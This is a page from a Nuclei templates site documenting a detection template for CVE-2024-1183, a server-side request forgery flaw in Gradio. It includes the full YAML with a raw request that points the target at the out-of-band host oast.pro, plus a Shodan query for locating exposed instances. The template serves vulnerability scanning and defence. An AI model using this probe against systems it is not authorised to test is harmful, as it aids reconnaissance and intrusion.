Skip to content
Nuclei Templates

Gradio - Server Side Request Forgery

ID: CVE-2024-1183

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2024,ssrf,oast,gradio

Description

Section titled “Description”

An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the ‘file’ parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a ‘Location’ header or a ‘File not allowed’ error in the response.

YAML Source

Section titled “YAML Source”
id: CVE-2024-1183


info:
  name: Gradio - Server Side Request Forgery
  author: DhiyaneshDK
  severity: medium
  description: |
    An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response.
  reference:
    - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4
    - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-1183
    cwe-id: CWE-601
    epss-score: 0.00076
    epss-percentile: 0.32361
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"__gradio_mode__"
    product: gradio
    vendor: gradio_project
  tags: cve,cve2024,ssrf,oast,gradio


http:
  - raw:
      - |
        GET /file=http://oast.pro HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
        part: header
# digest: 4a0a00473045022100dc401778da0b0be4e7cf5d0df5908b254dc509e852a33fcee88eb7626829100902207ce947c8a1f020e24903b4dd07241b5246719a07931ae5724ba4c3ad46196eef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1183.yaml"

View on Github